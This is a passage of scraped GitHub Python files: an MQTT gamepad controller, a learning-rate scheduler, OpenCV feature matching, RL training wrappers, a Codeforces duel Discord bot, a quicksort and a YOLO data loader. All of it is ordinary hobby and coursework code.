str(speed)[:4])\n client.publish(\"B\", str(speed)[:4])\n elif d_pad_held[3]: \n client.publish(\"A\", str(-speed)[:4])\n client.publish(\"B\", str(-speed)[:4])\n else:\n client.publish(\"A\", str(0)[:4])\n client.publish(\"B\", str(0)[:4])\n\n if button_held[0]:\n client.publish(\"D\", str(-speed)[:4])\n elif button_held[1]:\n client.publish(\"D\", str(speed)[:4])\n else:\n client.publish(\"D\", str(0)[:4])\n\n # - draws (without updates) -\n screen.fill((255,255,255))\n pygame.display.flip()\n\n # - constant game speed / FPS -\n clock.tick(FPS)\n\n# - end -\npygame.quit()","repo_name":"NWalker4483/MSU_RMC_2021","sub_path":"host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9596541560","text":"from typing import List\nimport math\nfrom torch.optim.lr_scheduler import _LRScheduler\n\n\nclass CustomLRScheduler(_LRScheduler):\n \"\"\"\n Creating a custom LR scheduler module\n \"\"\"\n\n def __init__(\n self,\n optimizer,\n max_lr: float = 0.1,\n cycle_length: int = 1000,\n base_lr: float = 0.001,\n last_epoch=-1,\n **kwargs\n ):\n \"\"\"\n Create a new scheduler.\n\n Args:\n optimizer (torch.optim.Optimizer): The optimizer to use.\n max_lr (float): The maximum learning rate to use.\n cycle_length (int): The length of the cycle, in iterations.\n base_lr (float): The minimum learning rate to use.\n last_epoch (int): The index of the last epoch. Default: -1.\n \"\"\"\n self.max_lr = max_lr\n self.cycle_length = cycle_length\n self.base_lr = base_lr\n super().__init__(optimizer, last_epoch)\n\n def get_lr(self) -> List[float]:\n \"\"\"\n Compute the new learning rate using the triangular policy.\n \"\"\"\n cycle = math.floor(1 + self.last_epoch / (2 * self.cycle_length))\n x = abs(self.last_epoch / self.cycle_length - 2 * cycle + 1)\n lr = self.base_lr + (self.max_lr - self.base_lr) * max(0, (1 - x))\n\n return [lr for _ in self.optimizer.param_groups]\n","repo_name":"bsen26/homework","sub_path":"assignments/03-RegOpt/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"22689266645","text":"#coding:utf-8\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport datetime\r\n\r\n\r\n#定义一个drawmatches函数\r\ndef drawMatches(img1, kp1, img2, kp2, matches):\r\n # Create a new output image that concatenates the two images together\r\n # (a.k.a) a montage\r\n rows1 = img1.shape[0]\r\n cols1 = img1.shape[1]\r\n rows2 = img2.shape[0]\r\n cols2 = img2.shape[1]\r\n\r\n out = np.zeros((max([rows1,rows2]),cols1+cols2,3), dtype='uint8')\r\n\r\n # Place the first image to the left\r\n out[:rows1,:cols1] = np.dstack([img1, img1, img1])\r\n\r\n # Place the next image to the right of it\r\n out[:rows2,cols1:] = np.dstack([img2, img2, img2])\r\n\r\n # For each pair of points we have between both images\r\n # draw circles, then connect a line between them\r\n for mat in matches:\r\n\r\n # Get the matching keypoints for each of the images\r\n img1_idx = mat.queryIdx\r\n img2_idx = mat.trainIdx\r\n\r\n # x - columns\r\n # y - rows\r\n (x1,y1) = kp1[img1_idx].pt\r\n (x2,y2) = kp2[img2_idx].pt\r\n\r\n # Draw a small circle at both co-ordinates\r\n # radius 4\r\n # colour blue\r\n # thickness = 1\r\n cv2.circle(out, (int(x1),int(y1)), 4, (201, 186, 131), 1) \r\n cv2.circle(out, (int(x2)+cols1,int(y2)), 4, (28, 127, 135), 1)\r\n\r\n # Draw a line in between the two points\r\n # thickness = 1\r\n # colour blue\r\n cv2.line(out, (int(x1),int(y1)), (int(x2)+cols1,int(y2)), (137, 69, 148), 1)\r\n\r\n\r\n # Show the image\r\n cv2.imshow('Matched Features', out)\r\n cv2.waitKey(0)\r\n cv2.destroyWindow('Matched Features')\r\n\r\n # Also return the image if you'd like a copy\r\n return out\r\n\r\n\r\nbeaver = cv2.imread('images/haha.PNG')\r\n#彩色图\r\n#plt.imshow(cv2.cvtColor(beaver,cv2.COLOR_BGR2RGB))\r\n#灰度图\r\ngray = cv2.cvtColor(beaver,cv2.COLOR_BGR2GRAY)\r\n#SIFT特征检测器\r\n#sift = cv2.xfeatures2d.SIFT_create()\r\nsift=cv2.SIFT()\r\n#sift = cv2.xfeatures2d.SIFT_create()\r\nkeypoints = sift.detect(beaver,None)\r\n#在图片中将特征点显示\r\nbeaver_sift = cv2.drawKeypoints(beaver,keypoints,None)\r\n#找到关键点和描述符(128*kp)\r\nkp,des = sift.compute(gray,keypoints)\r\nplt.imshow(cv2.cvtColor(beaver_sift, cv2.COLOR_BGR2RGB))\r\nplt.show()\r\n#特征点匹配\r\n#img1 = cv2.imread('images/box.png')\r\n#img2 = cv2.imread('images/box_in_scene.png')\r\n#img1 = cv2.imread('images/haha1.PNG')\r\n#img2 = cv2.imread('images/haha.PNG')\r\nimg1 = cv2.imread('images/jianjian.jpg')\r\nimg2 = cv2.imread('images/jianjian1.jpg')\r\n\"\"\"\r\nplt.subplot(1,2,1)\r\nplt.imshow(cv2.cvtColor(img1,cv2.COLOR_BGR2RGB))\r\nplt.subplot(1,2,2)\r\nplt.imshow(cv2.cvtColor(img2,cv2.COLOR_BGR2RGB))\r\n\"\"\"\r\n\"\"\"\r\ngray1 = cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\r\ngray2 = cv2.cvtColor(img2,cv2.COLOR_BGR2GRAY)\r\n\r\norb = cv2.ORB(1000, 1.2)\r\n\r\n(kp1,des1) = orb.detectAndCompute(gray1, None)\r\n\r\n(kp2,des2) = orb.detectAndCompute(gray2, None)\r\n\r\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\r\n\r\nmatches = bf.match(des1,des2)\r\n\r\nmatches = sorted(matches, key=lambda val: val.distance)\r\n\r\nout = drawMatches(gray1, kp1, gray2, kp2, matches[:30])\r\n\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\nkp1, des1 = sift.detectAndCompute(gray1, None)\r\nkp2, des2 = sift.detectAndCompute(gray2, None)\r\n\r\n\r\ndes1 = des1 / np.repeat(np.sum(des1, axis = 1).reshape(des1.shape[0], 1), des1.shape[1], axis=1)\r\ndes2 = des2 / np.repeat(np.sum(des2, axis = 1).reshape(des2.shape[0], 1), des2.shape[1], axis=1)\r\n\r\n# Calculate Hellinger distance for every feature pair\r\ndist_mat = np.sqrt(np.abs(1.0 - np.dot(np.sqrt(des1), np.sqrt(des2).transpose())))\r\n\r\n# Match with ratio test\r\nmin_arg = np.argsort(dist_mat, axis=1)\r\ngood_matches = []\r\nfor i in range(dist_mat.shape[0]):\r\n m, n = min_arg[i][0:2]\r\n if dist_mat[i][m] < dist_mat[i][n] * 0.75:\r\n dmatch = cv2.DMatch(i, m, 0, dist_mat[i][m]) # _queryIdx, _trainIdx, _imgIdx, _distance\r\n good_matches.append(dmatch)\r\n\r\n\r\nout = drawMatches(gray1, kp1, gray2, kp2, good_matches[:30])\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sun123zhengjun/deep-learning-","sub_path":"myopencv/mycv3.py","file_name":"mycv3.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70663609155","text":"import gym\nfrom stable_baselines import PPO2\nfrom stable_baselines.deepq import DQN\nfrom stable_baselines.common.vec_env.dummy_vec_env import DummyVecEnv\nfrom stable_baselines.bench import Monitor\nfrom stable_baselines.results_plotter import load_results, ts2xy\nimport numpy as np\nimport os\nfrom stable_baselines.common.vec_env import SubprocVecEnv\nfrom stable_baselines.common import set_global_seeds\nfrom gym_modifier.envs.cartpole import CartPoleEnv\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Flatten\nfrom keras.optimizers import Adam\nfrom keras_rl.agents.dqn import DQNAgent\nfrom keras_rl.policy import BoltzmannQPolicy\nfrom keras_rl.memory import SequentialMemory\nfrom keras_rl.callbacks import TrainIntervalLogger\nfrom keras_rl.callbacks import FileLogger\nfrom keras_rl.callbacks import ModelIntervalCheckpoint\n\n\n\n\ndef train_doubledqn(env_name='CartPole-v1',\n steps=10000,\n lr=5e-4,\n exploration_rate=1.0,\n log_dir='./Logs/',\n log_name = None,\n prev_model = None):\n \"\"\"\n Wrapper for training a network with DQN\n\n :param env_name: The name of the environment to load [String]\n :param steps: The number of time-steps to train for [Int]\n :param exploration_rate: The exploration rate for the algorithm [double or whatever]\n :param lr: The learning rate for the algorithm [double or whatever]\n :param log_dir: The base log folder [String]\n :param log_name: Puts the logs in a subdir of this name [String]\n \"\"\"\n\n # Generates a folder hierarchy for the logging:\n\n if log_name is None:\n log_dir = log_dir + env_name + '/' + 'DoubleDQN/double_dqn_{0:.0E}'.format(lr) + '/'\n else:\n log_dir = log_dir + env_name + '/' + log_name + '/DoubleDQN' + '/double_dqn_{0:.0E}'.format(lr) + '/'\n\n init_logging(log_dir)\n\n # Get the environment and extract the number of actions.\n env = gym.make(env_name)\n np.random.seed(123)\n env.seed(123)\n #nb_actions = len(env.action_space.sample())\n nb_actions = env.action_space.n\n\n # Next, we build a very simple model regardless of the dueling architecture\n # if you enable dueling network in DQN , DQN will build a dueling network base on your model automatically\n # Also, you can build a dueling network by yourself and turn off the dueling network in DQN.\n model = Sequential()\n model.add(Flatten(input_shape=(1,) + env.observation_space.shape))\n model.add(Dense(16))\n model.add(Activation('relu'))\n model.add(Dense(16))\n model.add(Activation('relu'))\n model.add(Dense(16))\n model.add(Activation('relu'))\n model.add(Dense(nb_actions))\n print(model.summary())\n\n # Finally, we configure and compile our agent. You can use every built-in Keras optimizer and\n # even the metrics!\n memory = SequentialMemory(limit=50000, window_length=1)\n policy = BoltzmannQPolicy(tau=exploration_rate)\n # enable the dueling network\n # you can specify the dueling_type to one of {'avg','max','naive'}\n dqn = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=10, enable_double_dqn=True,\n target_model_update=1e-2, policy=policy)\n dqn.compile(Adam(lr=lr), metrics=['mae'])\n if prev_model is not None:\n dqn.load_weights(prev_model)\n\n # Okay, now it's time to learn something! We visualize the training here for show, but this\n # slows down training quite a lot. You can always safely abort the training prematurely using\n # Ctrl + C.\n callbacks = [ModelIntervalCheckpoint(filepath=log_dir + \"/double_dqn_{0:.0E}.h5f\".format(lr), interval=1000),\n FileLogger(filepath=log_dir + \"/monitor.json\", interval=1000)]\n dqn.fit(env, nb_steps=steps, visualize=False, verbose=2, callbacks=callbacks)\n\n # After training is done, we save the final weights.\n dqn.save_weights(log_dir + \"/double_dqn_{0:.0E}.h5f\".format(lr), overwrite=True)\n\n\n\ndef train_deep(env_name='CartPole-v1',\n steps=10000,\n lr=5e-4,\n exploration_fraction=0.1,\n exploration_final_eps=0.02,\n log_dir='./Logs/',\n log_name=None):\n \"\"\"\n Wrapper for training a network with DQN\n\n :param env_name: The name of the environment to load [String]\n :param steps: The number of time-steps to train for [Int]\n :param exploration_fraction: The exploration rate for the algorithm [double or whatever]\n :param exploration_final_eps: The final exploration rate after decay [double or whatever]\n :param lr: The learning rate for the algorithm [double or whatever]\n :param log_dir: The base log folder [String]\n :param log_name: Puts the logs in a subdir of this name [String]\n \"\"\"\n\n # Generates a folder hierarchy for the logging:\n if log_name is None:\n log_dir = log_dir + env_name + '/' + 'DeepQ/deep_{0:.0E}'.format(lr) + '/'\n else:\n log_dir = log_dir + env_name + '/' + log_name + '/' + 'DeepQ/deep_{0:.0E}'.format(lr) + '/'\n init_logging(log_dir)\n\n # Generates an environment for the algorithm to train against\n env = DummyVecEnv([lambda: Monitor(gym.make(env_name), log_dir, allow_early_resets=True)])\n\n # Sets up a modified callback funtion to be able to handle saving etc. (Not really needed)\n best_mean_reward, n_steps, hist_rew = -np.inf, 0, 0\n\n def callback(_locals, _globals):\n \"\"\"\n Callback called at each step (for DQN an others) or after n steps (see ACER or PPO2)\n :param _locals: (dict)\n :param _globals: (dict)\n \"\"\"\n nonlocal n_steps, best_mean_reward, hist_rew\n # Print stats every 1000 calls\n if (n_steps + 1) % 5 == 0:\n # Evaluate policy performance\n x, y = ts2xy(load_results(log_dir), 'timesteps')\n if len(x) > 0:\n # mean_rew_plot(y, len(x))\n hist_rew = y.copy()\n mean_reward = np.mean(y[-100:])\n if (n_steps + 1) % 100 == 0:\n print(x[-1], 'timesteps')\n print(\n \"Best mean reward: {:.2f} - Last mean reward per episode: {:.2f}\".format(best_mean_reward,\n mean_reward))\n\n # New best model, you could save the agent here\n if mean_reward > best_mean_reward:\n best_mean_reward = mean_reward\n # Example for saving best model\n print(\"Saving new best model\")\n _locals['self'].save(log_dir + \"/deep_{0:.0E}.pkl\".format(lr))\n\n n_steps += 1\n return False\n\n # Creates the training model etc.\n dqn_nw = DQN('MlpPolicy',\n env,\n learning_rate=lr,\n exploration_fraction=exploration_fraction,\n exploration_final_eps=exploration_final_eps,\n checkpoint_freq=2000,\n learning_starts=1000,\n target_network_update_freq=500)\n\n # Starts the training:\n dqn_nw.learn(total_timesteps=steps, callback=callback)\n\n\ndef make_env(env_id, rank, seed=0, log_dir=''):\n \"\"\"\n Generates a function handle for creating a modified Monitor\n\n :param env_id: The environment name [String]\n :param rank: An additon to the seed to make the monitors have unique seeds\n :param seed:\n :param log_dir: The directory that the monitor saves its \"monitor.csv\" file in\n :return: The generated function handle\n \"\"\"\n\n def _init():\n env = gym.make(env_id)\n env.seed(seed + rank)\n env = Monitor(env, log_dir + 'cpu_' + str(rank) + '/', allow_early_resets=True)\n return env\n\n set_global_seeds(seed)\n return _init\n\n\ndef train_ppo(env_name='CartPole-v1',\n steps=10000,\n lr=5e-4,\n gamma=0.99,\n max_grad_norm=0.5,\n n_mini_batches=4,\n log_dir='./Logs/',\n n_cpus=1,\n prev_model=None,\n log_name=None):\n \"\"\"\n Wrapper for training a network with ppo2. \n\n :param env_name: The name of the environment to load [String]\n :param steps: The number of timesteps to train for [Int]\n :param lr: The learning rate for the algorithm [Double or whatever]\n :param gamma: Discount factor [Double or whatever]\n :param max_grad_norm: The maximum value for the gradient clipping [Double or whatever]\n :param n_mini_batches: Number of training minibatches per update. For recurrent policies,\n the number of environments run in parallel should be a multiple of nminibatches. [Int]\n :param log_dir: The base log folder [String]\n :param n_cpus: The number of environments to setup and run in parallel [Int]\n :param prev_model: Path to any previously trained model to continue training on [String]\n :param log_name: Puts the logs in a subdir of this name [String]\n \"\"\"\n\n # Generates a folder hirachy for the logging:\n if log_name is None:\n log_dir = log_dir + env_name + '/' + 'PPO/ppo_{0:.0E}'.format(lr) + '/'\n else:\n log_dir = log_dir + env_name + '/' + log_name + '/' + 'PPO/ppo_{0:.0E}'.format(lr) + '/'\n monitor_dir = log_dir + 'monitors/'\n init_logging(monitor_dir)\n\n for cp in range(n_cpus):\n if not os.path.isdir(monitor_dir + 'cpu_' + str(cp) + '/'):\n os.mkdir(monitor_dir + 'cpu_' + str(cp) + '/')\n\n # Generates a set of environments to run on the different cpu's in parallel\n env = SubprocVecEnv([make_env(env_name, i, log_dir=monitor_dir) for i in range(n_cpus)])\n\n # Sets up a modified callback function to be able to handle saving etc. (Not really needed)\n best_mean_reward = -np.inf\n n_steps = 0\n\n def callback(_locals, _globals):\n nonlocal n_steps, best_mean_reward\n if (n_steps + 1) % 10 == 0:\n y = np.array([dic['r'] for dic in reversed(_locals['ep_info_buf'])])\n if len(y) > 0:\n mean_reward = np.mean(y)\n print('--------------------------------------')\n print('| Timestep: {0}'.format(_locals['timestep'] * 128))\n print(\"| Best mean reward: {:.2f} - Reward mean 100: {:.2f}\".format(best_mean_reward,\n mean_reward))\n print(\"| Buf length: {:.2f}\".format(len(y)))\n print('--------------------------------------')\n #if _locals['ep_info_buf'][-1]['r'] > best_mean_reward:\n # best_mean_reward = _locals['ep_info_buf'][-1]['r']\n if mean_reward > best_mean_reward:\n best_mean_reward = mean_reward\n # Example for saving best model\n #print(\"Saving new best model with rewards {:.2F}\".format(_locals['ep_info_buf'][-1]['r']))\n #_locals['self'].save(log_dir + \"/ppo_{0:.0E}\".format(lr) + \".pkl\")\n print(\"Saving new best model with mean rewards {:.2F}\".format(mean_reward))\n _locals['self'].save(log_dir + \"/ppo_{0:.0E}\".format(lr) + \".pkl\")\n n_steps += 1\n return False\n\n # Loads a previously trained model if there exists one, otherwise creates a new one\n if prev_model is not None:\n ppo2_nw = PPO2.load(prev_model, env=env)\n else:\n ppo2_nw = PPO2('MlpPolicy',\n env,\n learning_rate=lr,\n gamma=gamma,\n max_grad_norm=max_grad_norm,\n nminibatches=n_mini_batches)\n\n # Starts the training:\n ppo2_nw.learn(total_timesteps=int(steps), callback=callback)\n\n\ndef init_logging(log_dir='./Logs/'):\n \"\"\"\n Generates a folder hierarchy for the logging\n \n :param log_dir: The base directory for the logs\n \"\"\"\n dirs = log_dir.split(sep='/')\n acc_dir = dirs[0] + '/'\n for d in dirs[1:]:\n acc_dir = acc_dir + '/' + d\n if not os.path.isdir(acc_dir):\n os.mkdir(acc_dir)\n","repo_name":"jonathanJansson/2DoF-Inverted-Pendulum-RL","sub_path":"baselines_wrapper/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":12157,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"23918359864","text":"import logging\nimport os\nimport time\n\nimport discord as ds\nfrom discord.ext import commands\n\nfrom services.db import handles_db, duels_db\nfrom services.api import cf\n\nfrom utils import get_duel_prob\n\nfrom keep_alive import keep_alive\n\n# load_dotenv(\".env\")\n\nbot = commands.Bot(command_prefix=\".\", intents=ds.Intents.all())\n\nlogger = logging.getLogger(\"discord\")\n# logger.name = \"khelafinal\"\n\n\nDESCRIPTIONS = {\n \"handle_set\": \"Set or update handle\",\n \"handle_list\": \"Lists all registered handles in this server (incognito)\",\n \"duel\": \"Challenge someone for a duel (mentions opponent)\",\n \"accept\": \"Accept a duel\",\n \"drop\": \"Drop a duel\",\n \"complete\": \"Complete a duel\",\n \"help\": \"Shows all commands (incognito)\",\n}\n\nHELP = {\n \"handle_set `handlle`\": \"Set your own handle\",\n \"handle_set `handlle` `member`\": \"Set `member`'s handle\",\n \"handle_list\": \"Lists all registered handles in this server (incognito)\",\n \"duel `opponent` `rating`\": \"Challenge `opponent` with a duel (mentions opponent)\",\n # \"duel_list\": \"List all duels (ongoing and challenged)\",\n \"accept\": \"Accept a duel\",\n \"drop\": \"Drop a duel\",\n \"complete\": \"Complete a duel\",\n \"help\": \"Shows this message\",\n}\n\n\n@bot.event\nasync def on_ready():\n synced = await bot.tree.sync()\n logger.info(f\"Number of slash commands synced: {len(synced)}\")\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"handle_set\"])\nasync def handle_set(itr: ds.Interaction, handle: str, member: ds.Member = None):\n \"\"\"\n :param handle: Codeforces handle of the member\n :param member: Member of the server whose handle is being set\n \"\"\"\n # set member to self if not mentioned\n if member == None:\n member = itr.user\n\n embed = ds.Embed()\n\n # show error if handle does not exist\n if not cf.handle_exists(handle):\n embed.description = f\"Could not find handle, {handle} in CF\"\n embed.color = ds.Color.red()\n else:\n handles_db.set_or_update_handle(handle, member.id)\n embed.description = f\"Handle of {member.mention} set to {handle}\"\n embed.color = ds.Color.green()\n\n await itr.response.send_message(embed=embed)\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"handle_list\"])\nasync def handle_list(itr: ds.Interaction):\n u, h = handles_db.get_all_uid_handle()\n user_mentions = []\n handles = []\n\n # only show hanldes of users who are present in the server\n for uid, handle in zip(u, h):\n user = itr.guild.get_member(uid)\n if user != None:\n user_mentions.append(user.mention)\n handles.append(handle)\n\n embed = ds.Embed()\n # if no users found, show error\n if not user_mentions:\n embed.description = (\n \"No handle found.\\n:point_right: Type `/handleset` to set handle\"\n )\n embed.color = ds.Color.red()\n else:\n embed.title = \"List of all handles\"\n embed.add_field(name=\"Username\", value=\"\\n\".join(user_mentions))\n embed.add_field(name=\"Handle\", value=\"\\n\".join(handles))\n await itr.response.send_message(embed=embed, ephemeral=True)\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"duel\"])\nasync def duel(itr: ds.Interaction, opponent: ds.Member, rating: int):\n \"\"\"\n :param opponent: Member of the server you want to challenge\n :param rating: Rating of the problem\n \"\"\"\n uid1 = itr.user.id\n uid2 = opponent.id\n embed = ds.Embed(description=\"Proposing a duel ...\")\n await itr.response.send_message(embed=embed, ephemeral=True)\n embed.color = ds.Color.red()\n embed.description = None\n message_content = None\n ephemeral = False\n if uid1 == uid2:\n embed.description = \"You cannot challenge yourself for a duel\"\n ephemeral = True\n elif not handles_db.uid_exists(uid1):\n embed.description = (\n \"Could not find your handle in the database\\n\"\n \":point_right: Type `/handle_set` to set your handle\"\n )\n ephemeral = True\n elif not handles_db.uid_exists(uid2):\n embed.description = (\n f\"Could not find {opponent.mention}'s handle in the database\\n\"\n \":point_right: Type `/handle_set` to set your handle\"\n )\n elif rating not in range(800, 3600, 100):\n embed.description = f\"Rating must be a multiple of 100 between 800 and 3500\"\n ephemeral = True\n elif duels_db.duel_exists(itr.guild_id, itr.channel_id, uid1):\n embed.description = (\n \"You are already in a duel\\n\"\n \":point_right: Type `/drop` to drop the duel\"\n # \":point_right: Type `/duel_list` to list all duels\"\n )\n ephemeral = True\n elif duels_db.duel_exists(itr.guild_id, itr.channel_id, uid2):\n embed.description = (\n f\"{opponent.mention} is already in a duel\\n\"\n \":point_right: Type `/drop` to drop the duel\"\n # \":point_right: Type `/duel_list` to list all duels\"\n )\n else:\n duels_db.new(itr.guild_id, itr.channel_id, uid1, uid2, rating)\n message_content = opponent.mention\n embed.title = f\"{opponent.display_name}, are you up for a duel?\\n\"\n embed.add_field(name=\"Opponent\", value=itr.user.mention)\n embed.add_field(name=\"rating\", value=rating)\n embed.color = None\n embed.set_footer(text=\"Type /accept to accept the duel\")\n await itr.followup.send(\n content=message_content,\n embed=embed,\n ephemeral=ephemeral,\n )\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"accept\"])\nasync def accept(itr: ds.Interaction):\n embed = ds.Embed(color=ds.Color.red())\n ephemeral = False\n message_content = None\n uid2 = itr.user.id\n\n if not duels_db.duel_exists(itr.guild_id, itr.channel_id, uid2=uid2):\n embed.description = \"No one challenged you for a duel\"\n ephemeral = True\n await itr.response.send_message(\n content=message_content, embed=embed, ephemeral=ephemeral\n )\n elif duels_db.duel_is_ongoing(itr.guild_id, itr.channel_id, uid2=uid2):\n embed.description = \"You are already in a duel\"\n ephemeral = True\n await itr.response.send_message(\n content=message_content, embed=embed, ephemeral=ephemeral\n )\n else:\n embed.description = \"Searching a good problems for you ...\"\n embed.color = None\n await itr.response.send_message(embed=embed, ephemeral=True)\n duel_details = duels_db.get_duel_details(\n itr.guild_id, itr.channel_id, uid2=uid2\n )\n uid1 = duel_details[\"uid1\"]\n rating = duel_details[\"rating\"]\n\n contestId, index = get_duel_prob(uid1, uid2, rating)\n duels_db.add_problem_and_time(\n itr.guild_id, itr.channel_id, uid1, contestId, index, int(time.time())\n )\n u1_mention = itr.guild.get_member(uid1).mention\n u2_mention = itr.user.mention\n problem_url = f\"https://codeforces.com/problemset/problem/{contestId}/{index}\"\n\n message_content = u1_mention\n embed.title = \"Duel started!\"\n embed.description = f\"{u1_mention} :crossed_swords: {u2_mention}\"\n embed.add_field(name=\"Rating\", value=rating)\n embed.add_field(name=\"Problem URL\", value=problem_url, inline=False)\n embed.set_footer(text=\"Type /complete after completing the challenge\")\n await itr.followup.send(\n content=message_content,\n embed=embed,\n ephemeral=ephemeral,\n )\n cf.set_problemset_json()\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"drop\"])\nasync def drop(itr: ds.Interaction):\n embed = ds.Embed()\n ephemeral = False\n if duels_db.duel_exists(itr.guild_id, itr.channel_id, uid=itr.user.id):\n duel_details = duels_db.get_duel_details(\n itr.guild_id, itr.channel_id, uid=itr.user.id\n )\n u1 = itr.guild.get_member(duel_details[\"uid1\"])\n u2 = itr.guild.get_member(duel_details[\"uid2\"])\n duels_db.drop(itr.guild_id, itr.channel_id, itr.user.id)\n embed.title = \"Duel dropped\"\n embed.add_field(\n name=\"Duel\",\n value=f\"{u1.mention} :crossed_swords: {u2.mention}\",\n inline=False,\n )\n embed.add_field(name=\"Dropped by\", value=itr.user.mention)\n else:\n embed.description = \"No duel to drop\"\n embed.color = ds.Color.red()\n ephemeral = True\n await itr.response.send_message(embed=embed, ephemeral=ephemeral)\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"complete\"])\nasync def complete(itr: ds.Interaction):\n embed = ds.Embed(color=ds.Color.red())\n ephemeral = True\n if not duels_db.duel_is_ongoing(itr.guild_id, itr.channel_id, uid=itr.user.id):\n embed.description = \"You are not in an ongoing duel\"\n await itr.response.send_message(embed=embed, ephemeral=ephemeral)\n else:\n embed.description = \"This might take a while ...\"\n await itr.response.send_message(embed=embed, ephemeral=ephemeral)\n duel_details = duels_db.get_duel_details(\n itr.guild_id, itr.channel_id, uid=itr.user.id\n )\n contestId = duel_details[\"contestId\"]\n index = duel_details[\"index\"]\n prob = (contestId, index)\n uid1 = duel_details[\"uid1\"]\n uid2 = duel_details[\"uid2\"]\n u1 = itr.guild.get_member(uid1)\n u2 = itr.guild.get_member(uid2)\n handle1 = handles_db.uid2handle(uid1)\n handle2 = handles_db.uid2handle(uid2)\n creationTime1 = cf.get_all_accepted_probs(handle1).get(prob, float('inf'))\n creationTime2 = cf.get_all_accepted_probs(handle2).get(prob, float('inf'))\n if creationTime1 == float('inf') and creationTime2 == float('inf'):\n embed.description = (\n \"None of you have completed the challenge yet\\n\"\n \":point_right: Type `/drop` if you want to give up\"\n )\n else:\n ephemeral = False\n embed.title = \"Duel completed\"\n embed.color = None\n duels_db.drop(itr.guild_id, itr.channel_id, uid1)\n if creationTime2 < creationTime1:\n embed.description = f\"{u2.mention} won against {u1.mention}!\"\n else:\n embed.description = f\"{u1.mention} won against {u2.mention}!\"\n await itr.followup.send(embed=embed, ephemeral=ephemeral)\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"help\"])\nasync def help(itr: ds.Interaction):\n embed = ds.Embed(title=\"List of all commands\")\n for name, value in HELP.items():\n embed.add_field(name=\"/\" + name, value=value, inline=False)\n await itr.response.send_message(embed=embed, ephemeral=True)\n\ntry:\n bot.run(\"\") #Give Your Bot Token Here in between \"\"\nexcept ds.errors.HTTPException:\n os.system(\"kill 1\")\n os.system(\"python restarter.py\")\n","repo_name":"nahian00777/Duel_Bot","sub_path":"Duel-Bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8387015339","text":"from sorting.utils import print_tests\nimport random\n\n\nclass QuickSort:\n \"\"\"\n Time complexity:\n - Worst case: O(nˆ2)\n - Best case: O(nlogn)\n - Average case: O(nlogn)\n Space complexity:\n - O(logn)\n \"\"\"\n @staticmethod\n def sort(data):\n if data is None:\n raise TypeError(\"data should not be None.\")\n\n if len(data) < 2:\n return data\n\n pivot_idx = random.randint(0, len(data)-1)\n pivot = data[pivot_idx]\n smaller = [i for i in data[:pivot_idx] if i < pivot] + [i for i in data[pivot_idx+1:] if i < pivot]\n greater = [i for i in data[:pivot_idx] if i >= pivot] + [i for i in data[pivot_idx+1:] if i >= pivot]\n return QuickSort.sort(smaller) + [pivot] + QuickSort.sort(greater)\n\n\nif __name__ == '__main__':\n print_tests(QuickSort)","repo_name":"tyraeltong/py-algorithms","sub_path":"sorting/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74923506753","text":"# Questão 5. Objetivo: Escreva uma função que encontra o index de um “turning number” em um array unimodal\r\n# array {10, 9, 8, 7, 6, 1, 2, 3, 4, 5}\r\n# O programa abaixo imprime o indice do menor valor em um vetor\r\n\r\nlista = []\r\ni = 0\r\nquantidade = int( input('Tamanho do vetor: '))\r\n\r\nwhile (i < quantidade):\r\n numero = input(\"Valor: \")\r\n i += 1\r\n lista.append(numero)\r\n\r\nprint(lista)\r\nprint ('Indice do menor valor:', lista.index(min(lista)))\r\n","repo_name":"Jessicaluana2693/Avalia-o-de-Automa-o-Python","sub_path":"encontrarIndexTurningnumberNoArray.py","file_name":"encontrarIndexTurningnumberNoArray.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12268370603","text":"from utils import anno_file_to_yolo_y\nimport os\nimport numpy as np\nfrom keras.preprocessing import image\n\nflatten = lambda l: [item for sublist in l for item in sublist]\n\nclass YoloDataGenerator(object):\n 'Generates image yolo from dataset'\n def __init__(self, image_dir, annotation_dir, grid = (7,7), batch_size = 16, target_size = (224, 224), JPEG_EXT = \"JPEG\"):\n 'Initialization'\n self.image_dir = image_dir # image id list\n self.annotation_dir = annotation_dir\n ids = []\n for clz in os.listdir(annotation_dir):\n ids.append([clz + \"/\" + f for f in os.listdir(annotation_dir + \"/\" + clz)])\n self.ids = flatten(ids)\n self.steps = 0\n self.batch_size = batch_size\n self.target_size = target_size\n self.grid = grid\n self.JPEG_EXT = JPEG_EXT\n\n def generate(self):\n while self.steps < len(self.ids) // self.batch_size:\n ids = self.ids[self.steps * self.batch_size: (self.steps + 1) * self.batch_size]\n image_files = [self.image_dir + \"/\" + id + \".\" + self.JPEG_EXT for id in ids]\n anno_files = [self.annotation_dir + \"/\" + 